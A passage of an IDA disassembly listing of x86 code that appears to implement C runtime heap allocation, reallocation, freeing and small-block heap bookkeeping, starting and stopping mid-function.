mov ecx, [ebp+arg_4]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+arg_4], ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
push 0
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_423A3C: ; CODE XREF: sub_423830+71�j
; sub_423830+1D7�j
cmp [ebp+var_24], 0
jnz short loc_423A4B
cmp ds:dword_4F3374, 0
jnz short loc_423A53
loc_423A4B: ; CODE XREF: sub_423830+210�j
mov eax, [ebp+var_24]
jmp loc_423CB2
; ---------------------------------------------------------------------------
loc_423A53: ; CODE XREF: sub_423830+219�j
mov edx, [ebp+arg_4]
push edx
call sub_423170
add esp, 4
test eax, eax
jnz short loc_423A6A
xor eax, eax
jmp loc_423CB2
; ---------------------------------------------------------------------------
loc_423A6A: ; CODE XREF: sub_423830+231�j
jmp loc_423896
; ---------------------------------------------------------------------------
loc_423A6F: ; CODE XREF: sub_423830+60�j
cmp ds:dword_4F39EC, 2
jnz loc_423C4A
cmp [ebp+arg_4], 0FFFFFFE0h
ja short loc_423A9C
cmp [ebp+arg_4], 0
jbe short loc_423A95
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
jmp short loc_423A9C
; ---------------------------------------------------------------------------
loc_423A95: ; CODE XREF: sub_423830+256�j
mov [ebp+arg_4], 10h
loc_423A9C: ; CODE XREF: sub_423830+250�j
; sub_423830+263�j ...
mov [ebp+var_24], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja loc_423C1A
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 1
lea ecx, [ebp+var_2C]
push ecx
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_426110
add esp, 0Ch
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz loc_423BE7
mov ecx, [ebp+arg_4]
cmp ecx, ds:dword_453BDC
jnb loc_423B78
mov edx, [ebp+arg_4]
shr edx, 4
push edx
mov eax, [ebp+var_30]
push eax
mov ecx, [ebp+var_2C]
push ecx
mov edx, [ebp+var_38]
push edx
call sub_426880
add esp, 10h
test eax, eax
jz short loc_423B15
mov eax, [ebp+arg_0]
mov [ebp+var_24], eax
jmp short loc_423B78
; ---------------------------------------------------------------------------
loc_423B15: ; CODE XREF: sub_423830+2DB�j
mov ecx, [ebp+arg_4]
shr ecx, 4
push ecx
call sub_426210
add esp, 4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_423B78
mov edx, [ebp+var_30]
xor eax, eax
mov al, [edx]
shl eax, 4
mov [ebp+var_34], eax
mov ecx, [ebp+var_34]
cmp ecx, [ebp+arg_4]
jnb short loc_423B4A
mov edx, [ebp+var_34]
mov [ebp+var_44], edx
jmp short loc_423B50
; ---------------------------------------------------------------------------
loc_423B4A: ; CODE XREF: sub_423830+310�j
mov eax, [ebp+arg_4]
mov [ebp+var_44], eax
loc_423B50: ; CODE XREF: sub_423830+318�j
mov ecx, [ebp+var_44]
push ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_24]
push eax
call sub_41FBF0
add esp, 0Ch
mov ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_38]
push eax
call sub_4261A0
add esp, 0Ch
loc_423B78: ; CODE XREF: sub_423830+2B8�j
; sub_423830+2E3�j ...
cmp [ebp+var_24], 0
jnz short loc_423BE5
mov ecx, [ebp+arg_4]
push ecx
push 0
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5418 ; RtlAllocateHeap
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_423BE5
mov eax, [ebp+var_30]
xor ecx, ecx
mov cl, [eax]
shl ecx, 4
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
cmp edx, [ebp+arg_4]
jnb short loc_423BB7
mov eax, [ebp+var_34]
mov [ebp+var_48], eax
jmp short loc_423BBD
; ---------------------------------------------------------------------------
loc_423BB7: ; CODE XREF: sub_423830+37D�j
mov ecx, [ebp+arg_4]
mov [ebp+var_48], ecx
loc_423BBD: ; CODE XREF: sub_423830+385�j
mov edx, [ebp+var_48]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_24]
push ecx
call sub_41FBF0
add esp, 0Ch
mov edx, [ebp+var_30]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_38]
push ecx
call sub_4261A0
add esp, 0Ch
loc_423BE5: ; CODE XREF: sub_423830+34C�j
; sub_423830+368�j
jmp short loc_423C01
; ---------------------------------------------------------------------------
loc_423BE7: ; CODE XREF: sub_423830+2A9�j
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
push 0
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_423C01: ; CODE XREF: sub_423830:loc_423BE5�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423C0F
jmp short loc_423C1A
; END OF FUNCTION CHUNK FOR sub_423830
; =============== S U B R O U T I N E =======================================
sub_423C0F proc near ; CODE XREF: sub_423830+3D8�p
; DATA XREF: _1:0043D08C�o
push 9
call sub_423320
add esp, 4
retn
sub_423C0F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423830
loc_423C1A: ; CODE XREF: sub_423830+277�j
; sub_423830+3DD�j
cmp [ebp+var_24], 0
jnz short loc_423C29
cmp ds:dword_4F3374, 0
jnz short loc_423C31
loc_423C29: ; CODE XREF: sub_423830+3EE�j
mov eax, [ebp+var_24]
jmp loc_423CB2
; ---------------------------------------------------------------------------
loc_423C31: ; CODE XREF: sub_423830+3F7�j
mov edx, [ebp+arg_4]
push edx
call sub_423170
add esp, 4
test eax, eax
jnz short loc_423C45
xor eax, eax
jmp short loc_423CB2
; ---------------------------------------------------------------------------
loc_423C45: ; CODE XREF: sub_423830+40F�j
jmp loc_423A9C
; ---------------------------------------------------------------------------
loc_423C4A: ; CODE XREF: sub_423830+246�j
; sub_423830:loc_423CB0�j
mov [ebp+var_24], 0
cmp [ebp+arg_4], 0FFFFFFE0h
ja short loc_423C88
cmp [ebp+arg_4], 0
jnz short loc_423C64
mov [ebp+arg_4], 1
loc_423C64: ; CODE XREF: sub_423830+42B�j
mov eax, [ebp+arg_4]
add eax, 0Fh
and al, 0F0h
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F54AC ; RtlReAllocateHeap
mov [ebp+var_24], eax
loc_423C88: ; CODE XREF: sub_423830+425�j
cmp [ebp+var_24], 0
jnz short loc_423C97
cmp ds:dword_4F3374, 0
jnz short loc_423C9C
loc_423C97: ; CODE XREF: sub_423830+45C�j
mov eax, [ebp+var_24]
jmp short loc_423CB2
; ---------------------------------------------------------------------------
loc_423C9C: ; CODE XREF: sub_423830+465�j
mov ecx, [ebp+arg_4]
push ecx
call sub_423170
add esp, 4
test eax, eax
jnz short loc_423CB0
xor eax, eax
jmp short loc_423CB2
; ---------------------------------------------------------------------------
loc_423CB0: ; CODE XREF: sub_423830+47A�j
jmp short loc_423C4A
; ---------------------------------------------------------------------------
loc_423CB2: ; CODE XREF: sub_423830+3B�j
; sub_423830+54�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423830
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423CD0 proc near ; CODE XREF: sub_41CA80+26E�p
; sub_41CA80+3B2�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00423D56 SIZE 00000077 BYTES
; FUNCTION CHUNK AT 00423DD8 SIZE 0000003E BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D090
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_423CFE
jmp loc_423E05
; ---------------------------------------------------------------------------
loc_423CFE: ; CODE XREF: sub_423CD0+27�j
cmp ds:dword_4F39EC, 3
jnz short loc_423D74
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
mov eax, [ebp+arg_0]
push eax
call sub_4240F0
add esp, 4
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_423D3D
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1C]
push edx
call sub_4241B0
add esp, 8
loc_423D3D: ; CODE XREF: sub_423CD0+5B�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423D4B
jmp short loc_423D56
sub_423CD0 endp
; =============== S U B R O U T I N E =======================================
sub_423D4B proc near ; CODE XREF: sub_423CD0+74�p
; DATA XREF: _1:0043D098�o
push 9
call sub_423320
add esp, 4
retn
sub_423D4B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CD0
loc_423D56: ; CODE XREF: sub_423CD0+79�j
cmp [ebp+var_1C], 0
jnz short loc_423D6F
mov eax, [ebp+arg_0]
push eax
push 0
mov ecx, ds:dword_4F39E8
push ecx
call ds:dword_4F5414 ; RtlFreeHeap
loc_423D6F: ; CODE XREF: sub_423CD0+8A�j
jmp loc_423E05
; ---------------------------------------------------------------------------
loc_423D74: ; CODE XREF: sub_423CD0+35�j
cmp ds:dword_4F39EC, 2
jnz short loc_423DF2
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 1
lea edx, [ebp+var_20]
push edx
lea eax, [ebp+var_28]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_426110
add esp, 0Ch
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_423DBF
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+var_28]
push ecx
call sub_4261A0
add esp, 0Ch
loc_423DBF: ; CODE XREF: sub_423CD0+D9�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423DCD
jmp short loc_423DD8
; END OF FUNCTION CHUNK FOR sub_423CD0
; =============== S U B R O U T I N E =======================================
sub_423DCD proc near ; CODE XREF: sub_423CD0+F6�p
; DATA XREF: _1:0043D0A4�o
push 9
call sub_423320
add esp, 4
retn
sub_423DCD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CD0
loc_423DD8: ; CODE XREF: sub_423CD0+FB�j
cmp [ebp+var_24], 0
jnz short loc_423DF0
mov edx, [ebp+arg_0]
push edx
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5414 ; RtlFreeHeap
loc_423DF0: ; CODE XREF: sub_423CD0+10C�j
jmp short loc_423E05
; ---------------------------------------------------------------------------
loc_423DF2: ; CODE XREF: sub_423CD0+AB�j
mov ecx, [ebp+arg_0]
push ecx
push 0
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5414 ; RtlFreeHeap
loc_423E05: ; CODE XREF: sub_423CD0+29�j
; sub_423CD0:loc_423D6F�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423CD0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423E20 proc near ; CODE XREF: sub_41D1D0+4A�p
; _0:00423F33�p
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423E8D SIZE 0000003A BYTES
; FUNCTION CHUNK AT 00423ED2 SIZE 00000052 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D0A8
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_1C], 0FFFFFFFEh
cmp ds:dword_4F39EC, 3
jnz short loc_423E8F
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 0
call sub_4256F0
test eax, eax
jge short loc_423E74
mov [ebp+var_1C], 0FFFFFFFCh
loc_423E74: ; CODE XREF: sub_423E20+4B�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423E82
jmp short loc_423E8D
sub_423E20 endp
; =============== S U B R O U T I N E =======================================
sub_423E82 proc near ; CODE XREF: sub_423E20+5B�p
; DATA XREF: _1:0043D0B0�o
push 9
call sub_423320
add esp, 4
retn
sub_423E82 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423E20
loc_423E8D: ; CODE XREF: sub_423E20+60�j
jmp short loc_423ED2
; ---------------------------------------------------------------------------
loc_423E8F: ; CODE XREF: sub_423E20+31�j
cmp ds:dword_4F39EC, 2
jnz short loc_423ED2
push 9
call sub_423280
add esp, 4
mov [ebp+var_4], 1
call sub_4269F0
test eax, eax
jge short loc_423EB9
mov [ebp+var_1C], 0FFFFFFFCh
loc_423EB9: ; CODE XREF: sub_423E20+90�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_423EC7
jmp short loc_423ED2
; END OF FUNCTION CHUNK FOR sub_423E20
; =============== S U B R O U T I N E =======================================
sub_423EC7 proc near ; CODE XREF: sub_423E20+A0�p
; DATA XREF: _1:0043D0BC�o
push 9
call sub_423320
add esp, 4
retn
sub_423EC7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423E20
loc_423ED2: ; CODE XREF: sub_423E20:loc_423E8D�j
; sub_423E20+76�j ...
push 0
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5474 ; HeapValidate
test eax, eax
jnz short loc_423F10
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_423F09
call sub_429AA0
mov dword ptr [eax], 78h
call sub_429A90
mov dword ptr [eax], 28h
jmp short loc_423F10
; ---------------------------------------------------------------------------
loc_423F09: ; CODE XREF: sub_423E20+CF�j
mov [ebp+var_1C], 0FFFFFFFCh
loc_423F10: ; CODE XREF: sub_423E20+C4�j
; sub_423E20+E7�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_423E20
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call sub_423E20
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp ds:dword_4F39EC, 3
jnz short loc_423F53
mov eax, ds:dword_4F3A0C
jmp short loc_423F65
; ---------------------------------------------------------------------------
loc_423F53: ; CODE XREF: _0:00423F4A�j
cmp ds:dword_4F39EC, 2
jnz short loc_423F63
mov eax, ds:dword_453BDC
jmp short loc_423F65
; ---------------------------------------------------------------------------
loc_423F63: ; CODE XREF: _0:00423F5A�j
xor eax, eax
loc_423F65: ; CODE XREF: _0:00423F51�j _0:00423F61�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F39EC, 3
jnz short loc_423F9F
cmp dword ptr [ebp+8], 3F8h
ja short loc_423F98
mov eax, [ebp+8]
mov ds:dword_4F3A0C, eax
mov eax, 1
jmp loc_424076
; ---------------------------------------------------------------------------
loc_423F98: ; CODE XREF: _0:00423F84�j
xor eax, eax
jmp loc_424076
; ---------------------------------------------------------------------------
loc_423F9F: ; CODE XREF: _0:00423F7B�j
cmp ds:dword_4F39EC, 2
jnz short loc_423FD7
mov ecx, [ebp+8]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+8], ecx
cmp dword ptr [ebp+8], 780h
ja short loc_423FD0
mov edx, [ebp+8]
mov ds:dword_453BDC, edx
mov eax, 1
jmp loc_424076
; ---------------------------------------------------------------------------
loc_423FD0: ; CODE XREF: _0:00423FBB�j
xor eax, eax
jmp loc_424076
; ---------------------------------------------------------------------------
loc_423FD7: ; CODE XREF: _0:00423FA6�j
cmp ds:dword_4F39EC, 1
jnz loc_424074
cmp dword ptr [ebp+8], 0
jbe loc_424074
lea eax, [ebp-4]
push eax
call sub_426C30
add esp, 4
mov ecx, [ebp-4]
and ecx, 0FFh
cmp ecx, 6
jl short loc_42403C
cmp dword ptr [ebp+8], 3F8h
ja short loc_42403A
mov edx, [ebp+8]
push edx
call sub_424080
add esp, 4
test eax, eax
jz short loc_42403A
mov eax, [ebp+8]
mov ds:dword_4F3A0C, eax
mov ds:dword_4F39EC, 3
mov eax, 1
jmp short loc_424076
; ---------------------------------------------------------------------------
loc_42403A: ; CODE XREF: _0:0042400F�j _0:0042401F�j
jmp short loc_424074
; ---------------------------------------------------------------------------
loc_42403C: ; CODE XREF: _0:00424006�j
mov ecx, [ebp+8]
add ecx, 0Fh
and ecx, 0FFFFFFF0h
mov [ebp+8], ecx
cmp dword ptr [ebp+8], 780h
ja short loc_424074
call sub_425D50
test eax, eax
jz short loc_424074
mov edx, [ebp+8]
mov ds:dword_453BDC, edx
mov ds:dword_4F39EC, 2
mov eax, 1
jmp short loc_424076
; ---------------------------------------------------------------------------
loc_424074: ; CODE XREF: _0:00423FDE�j _0:00423FE8�j ...
xor eax, eax
loc_424076: ; CODE XREF: _0:00423F93�j _0:00423F9A�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424080 proc near ; CODE XREF: _0:00424015�p
; sub_426EC0+44�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 140h
push 0
mov eax, ds:dword_4F39E8
push eax
call ds:dword_4F5418 ; RtlAllocateHeap
mov ds:dword_4F3A08, eax
cmp ds:dword_4F3A08, 0
jnz short loc_4240A8
xor eax, eax
jmp short loc_4240E0
; ---------------------------------------------------------------------------
loc_4240A8: ; CODE XREF: sub_424080+22�j
mov ecx, [ebp+arg_0]
mov ds:dword_4F3A0C, ecx
mov edx, ds:dword_4F3A08
mov ds:dword_4F39F8, edx
mov ds:dword_4F3A00, 0
mov ds:dword_4F3A04, 0
mov ds:dword_4F39F0, 10h
mov eax, 1
loc_4240E0: ; CODE XREF: sub_424080+26�j
pop ebp
retn
sub_424080 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4240F0 proc near ; CODE XREF: sub_41D6B0+41�p
; sub_423620+52�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, ds:dword_4F3A04
imul eax, 14h
mov ecx, ds:dword_4F3A08
add ecx, eax
mov [ebp+var_C], ecx
mov edx, ds:dword_4F3A08
mov [ebp+var_8], edx
loc_424112: ; CODE XREF: sub_4240F0+4D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_42413F
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
sub edx, [ecx+0Ch]
mov [ebp+var_4], edx
cmp [ebp+var_4], 100000h
jnb short loc_424134
mov eax, [ebp+var_8]
jmp short loc_424141
; ---------------------------------------------------------------------------
loc_424134: ; CODE XREF: sub_4240F0+3D�j
mov eax, [ebp+var_8]
add eax, 14h
mov [ebp+var_8], eax
jmp short loc_424112
; ---------------------------------------------------------------------------
loc_42413F: ; CODE XREF: sub_4240F0+28�j
xor eax, eax
loc_424141: ; CODE XREF: sub_4240F0+42�j
mov esp, ebp
pop ebp
retn
sub_4240F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424150 proc near ; CODE XREF: sub_41D6B0+5D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
sub ecx, [eax+0Ch]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
shr edx, 0Fh
mov [ebp+var_4], edx
mov eax, 80000000h
mov ecx, [ebp+var_4]
shr eax, cl
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
and edx, eax
test edx, edx
jnz short loc_4241A1
mov eax, [ebp+var_8]
and eax, 0Fh
test eax, eax
jnz short loc_4241A1
mov ecx, [ebp+var_8]
and ecx, 0FFFh
test ecx, ecx
jz short loc_4241A1
mov [ebp+var_C], 1
jmp short loc_4241A8
; ---------------------------------------------------------------------------
loc_4241A1: ; CODE XREF: sub_424150+2F�j
; sub_424150+39�j ...
mov [ebp+var_C], 0
loc_4241A8: ; CODE XREF: sub_424150+4F�j
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_424150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4241B0 proc near ; CODE XREF: sub_423830+132�p
; sub_423830+1B2�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
mov [ebp+var_3C], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
sub eax, [edx+0Ch]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shr ecx, 0Fh
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
imul edx, 204h
mov eax, [ebp+var_3C]
lea ecx, [eax+edx+144h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
sub edx, 4
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
mov ecx, [eax]
sub ecx, 1
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
and edx, 1
test edx, edx
jz short loc_42420D
jmp loc_424788
; ---------------------------------------------------------------------------
loc_42420D: ; CODE XREF: sub_4241B0+56�j
mov eax, [ebp+var_1C]
add eax, [ebp+var_30]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_14], edx
mov eax, [ebp+var_1C]
mov ecx, [eax-4]
mov [ebp+var_C], ecx
mov edx, [ebp+var_14]
and edx, 1
test edx, edx
jnz loc_424357
mov eax, [ebp+var_14]
sar eax, 4
sub eax, 1
mov [ebp+var_24], eax
cmp [ebp+var_24], 3Fh
jbe short loc_42424E
mov [ebp+var_24], 3Fh
loc_42424E: ; CODE XREF: sub_4241B0+95�j
mov ecx, [ebp+var_38]
mov edx, [ebp+var_38]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_424330
cmp [ebp+var_24], 20h
jnb short loc_4242C5
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_24]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_4242C3
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_4242C3: ; CODE XREF: sub_4241B0+F9�j
jmp short loc_424330
; ---------------------------------------------------------------------------
loc_4242C5: ; CODE XREF: sub_4241B0+B4�j
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_424330
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_424330: ; CODE XREF: sub_4241B0+AA�j
; sub_4241B0:loc_4242C3�j ...
mov ecx, [ebp+var_38]
mov edx, [ecx+8]
mov eax, [ebp+var_38]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_38]
mov eax, [edx+4]
mov ecx, [ebp+var_38]
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_30]
add eax, [ebp+var_14]
mov [ebp+var_30], eax
loc_424357: ; CODE XREF: sub_4241B0+7F�j
mov ecx, [ebp+var_30]
sar ecx, 4
sub ecx, 1
mov [ebp+var_28], ecx
cmp [ebp+var_28], 3Fh
jbe short loc_424370
mov [ebp+var_28], 3Fh
loc_424370: ; CODE XREF: sub_4241B0+1B7�j
mov edx, [ebp+var_C]
and edx, 1
test edx, edx
jnz loc_4244D4
mov eax, [ebp+var_1C]
sub eax, [ebp+var_C]
mov [ebp+var_34], eax
mov ecx, [ebp+var_C]
sar ecx, 4
sub ecx, 1
mov [ebp+var_2C], ecx
cmp [ebp+var_2C], 3Fh
jbe short loc_4243A0
mov [ebp+var_2C], 3Fh
loc_4243A0: ; CODE XREF: sub_4241B0+1E7�j
mov edx, [ebp+var_30]
add edx, [ebp+var_C]
mov [ebp+var_30], edx
mov eax, [ebp+var_30]
sar eax, 4
sub eax, 1
mov [ebp+var_28], eax
cmp [ebp+var_28], 3Fh
jbe short loc_4243C2
mov [ebp+var_28], 3Fh
loc_4243C2: ; CODE XREF: sub_4241B0+209�j
mov ecx, [ebp+var_2C]
cmp ecx, [ebp+var_28]
jz loc_4244CE
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
mov ecx, [edx+4]
cmp ecx, [eax+8]
jnz loc_4244B0
cmp [ebp+var_2C], 20h
jnb short loc_424445
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_2C]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_424443
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_424443: ; CODE XREF: sub_4241B0+279�j
jmp short loc_4244B0
; ---------------------------------------------------------------------------
loc_424445: ; CODE XREF: sub_4241B0+234�j
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_4244B0
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_4244B0: ; CODE XREF: sub_4241B0+22A�j
; sub_4241B0:loc_424443�j ...
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov eax, [ebp+var_34]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_34]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov [eax+8], edx
loc_4244CE: ; CODE XREF: sub_4241B0+218�j
mov eax, [ebp+var_34]
mov [ebp+var_1C], eax
loc_4244D4: ; CODE XREF: sub_4241B0+1C8�j
mov ecx, [ebp+var_C]
and ecx, 1
test ecx, ecx
jnz short loc_4244EA
mov edx, [ebp+var_2C]
cmp edx, [ebp+var_28]
jz loc_4245FA
loc_4244EA: ; CODE XREF: sub_4241B0+32C�j
mov eax, [ebp+var_28]
